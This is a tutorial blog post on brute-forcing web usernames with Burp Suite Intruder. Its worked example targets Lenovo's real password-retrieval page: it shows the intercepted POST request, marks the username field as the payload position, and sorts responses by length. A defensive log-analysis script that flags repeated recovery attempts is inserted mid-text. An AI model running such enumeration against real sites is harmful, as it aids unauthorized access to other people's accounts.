Brute Force attack

Source: Internet
Author: User
Tags lenovo

Next, let's talk about brute force on its own; it is a very important means of intrusion in penetration testing.

Here I only cover Web-based brute forcing. Brute-force cracking of other targets, such as hosts, firewalls and databases, is not covered; you can study those yourself. We should develop the habit of independent self-study: run into a problem, then solve it, looking for answers with questions in mind instead of cramming. These are actually teacher Wang Shuang's words, which I am sharing with everyone.

Burp Suite Intruder introduction

You can study a friend of mine's series of Burp Suite tutorials on your own; search Baidu for angelc0de and you will find him.

Burp Suite Intruder: a customizable, highly configurable tool that automates attacks on Web applications, such as enumerating identifiers, collecting useful data, and using fuzzing techniques to detect common vulnerabilities.

Although it is fairly complicated, we will only learn its brute-force function and ignore the rest.

Example 1: the password-retrieval page of Lenovo's PRCCN site, brute-force guessing the site's user names.

Prerequisites for guessing:

1. There is no verification code (CAPTCHA), or the verification code can be bypassed

2. The number of failed attempts is not limited

As it happens, both conditions are met here.
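Seen from the defending side, the second precondition shows up in the web server's access log as one client posting to the retrieval page far more often than a real user would. The following added example (not part of the original post) counts POSTs to /returnpassword.aspx per client IP in a sliding window; the combined-log-format lines, the 60-second window and the limit of 5 are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

RECOVERY_PATH = "/returnpassword.aspx"   # endpoint from the request on this page
WINDOW = timedelta(seconds=60)           # assumed window, tune to real traffic
MAX_ATTEMPTS = 5                         # assumed per-client limit inside WINDOW

# Combined log format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)

def flag_guessing_clients(lines, window=WINDOW, max_attempts=MAX_ATTEMPTS):
    """Return {ip: peak count} for clients exceeding max_attempts POSTs per window."""
    recent = defaultdict(deque)          # ip -> timestamps still inside the window
    flagged = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0].lower() != RECOVERY_PATH:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:        # drop attempts older than the window
            q.popleft()
        if len(q) > max_attempts:
            flagged[m["ip"]] = max(flagged.get(m["ip"], 0), len(q))
    return flagged

def sample_log():
    """Constructed log: one client posting every 2 s, one ordinary user."""
    fmt = '{ip} - - [01/Sep/2015:10:{mm:02d}:{ss:02d} +0800] "POST {p} HTTP/1.1" 200 2310'
    lines = [fmt.format(ip="203.0.113.7", mm=0, ss=2 * i, p=RECOVERY_PATH)
             for i in range(20)]
    lines.append(fmt.format(ip="198.51.100.4", mm=0, ss=5, p=RECOVERY_PATH))
    lines.append(fmt.format(ip="198.51.100.4", mm=3, ss=10, p=RECOVERY_PATH))
    return lines

if __name__ == "__main__":
    for ip, peak in flag_guessing_clients(sample_log()).items():
        print(f"{ip}: {peak} recovery POSTs within {WINDOW.seconds}s")
```

The same counter placed in the request handler, rejecting or challenging the client once the limit is exceeded, removes the second precondition instead of only reporting it.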

Enter the user name: 1111111

Use Burp Suite to intercept the request:

    POST /returnpassword.aspx HTTP/1.1
    Host: prccn.lenovo.com.cn
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://prccn.lenovo.com.cn/returnpassword.aspx
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 256

    __viewstate=%2fwepdwukmtq1ode5njeyn2rk4ugfzyijtsxr8zmctv0qudqdpkyth3f%2byk4fssjl1%2fc%3d&__eventvalidation=%2fwewawl8idwzcqkl1bkzcqlmhpebcsekqhvg3t9tyhehngwdzh23hhflgwf%2bt55btyaajjmp&txtusername=1111111&btnsendpassword=%e5%8f%96%e5%9b%9e%e5%af%86%e7%a0%81

Next, press Ctrl+I to send the intercepted request to Intruder.

Intruder now holds the same request that was intercepted.

Now, clear all the existing markers (Clear §), then use Add § to mark the value in the txtusername=1111111 key-value pair as the payload position, and finally load the wordlist dictionary so that Intruder does the brute-force guessing of the user name for us.

    POST /returnpassword.aspx HTTP/1.1
    Host: prccn.lenovo.com.cn
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://prccn.lenovo.com.cn/returnpassword.aspx
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 256

    __viewstate=%2fwepdwukmtq1ode5njeyn2rk4ugfzyijtsxr8zmctv0qudqdpkyth3f%2byk4fssjl1%2fc%3d&__eventvalidation=%2fwewawl8idwzcqkl1bkzcqlmhpebcsekqhvg3t9tyhehngwdzh23hhflgwf%2bt55btyaajjmp&txtusername=§1111111§&btnsendpassword=%e5%8f%96%e5%9b%9e%e5%af%86%e7%a0%81

See, the user name we are going to guess, 1111111, has been enclosed in the § markers.

Next, load our wordlist user name dictionary.

Under the Payloads tab, set Payload type to Runtime file, click Select file, and choose our wordlist user name dictionary.

After the dictionary is loaded, open the Intruder menu in the menu bar and select Start attack; Intruder begins the brute-force guessing for us.

After a few minutes, Intruder finishes guessing.

Now look at the Length column and check whether any responses have a unique length.

length=2482 (by eye, this looks like a successfully guessed user name)

Try it, input: AAA

It doesn't seem so. Continue to look at responses with other lengths.

Input: Alex, try it.

Still wrong. Forget it, I won't keep trying. In fact, there are more accurate ways to search; you can see the angelc0de series of tutorials, so I won't repeat them here.
